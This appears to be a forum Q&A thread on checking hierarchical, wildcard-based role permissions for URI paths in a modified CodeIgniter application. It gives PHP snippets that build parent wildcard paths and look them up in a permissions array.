It totally depends on your algorithm. You can probably write one that uses your current data format. You can also probably write a simpler one if you change your data format. But what your data format should look like then, well, that's a job for a programmer.
I found the answer myself:
lets say the user trying to access backend/article/add/new and this user in the supermoderator group. So I need to look for backend/*, backend/article/*, backend/article/add/*. array_slice() and for() enough for this:
I am using CodeIgniter by the way. I modified it a little bit to seperate frontend and backend controllers. I am not using application/controller directory. I am using application/backend and application/frontend directories for controllers.
So an uri pattern is this: http://site.com/[backend]*/[directory]*/class/method
// This is the page that user trying to reach
$requested_page = "backend/article/add/new";
// pharsing...
$x = explode('/', $requested_page);
// this is needed to cut last 3, 2, 1 items of $x
$i = count($x) > 3 ? -4 : -count($x);
for (; $i < 0; $i++) {
$resource = implode('/', array_slice($x, 0, $i)) . '/*';
// echoing for debug
echo $resource;
}
// Outputs:
// backend/*
// backend/article/*
// backend/article/add/*
function userHasPermissions($permissionsArray, $user, $path) {
// Check exact
if(isset($permissionsArray[$path]) &&
isset($permissionsArray[$path][$user])) {
return $permissionsArray[$path][$user];
}
// Check lower and lower
$partArr = explode('/', $path);
for($i = substr_count($path, '/'); $i >= 0; $i--) {
if($i > 0) {
$choppedPartArr = array_slice($partArr, 0, $i);
$newPath = implode($choppedPartArr, '/') . '/*';
} else {
$newPath = '*';
}
if(isset($permissionsArray[$newPath]) &&
isset($permissionsArray[$newPath][$user])) {
return $permissionsArray[$newPath][$user];
}
}
return false;
}
echo "Result: " . (userHasPermissions($array, 'supermoderator', 'backend/article/add') ? "true" : "false");
Note that 'backend/article' will return false for 'supermoderator' since 'backend/article/*' does not match it. To change this, simply change $i = substr_count($path, '/'); to $i = substr_count($path, '/')+1;.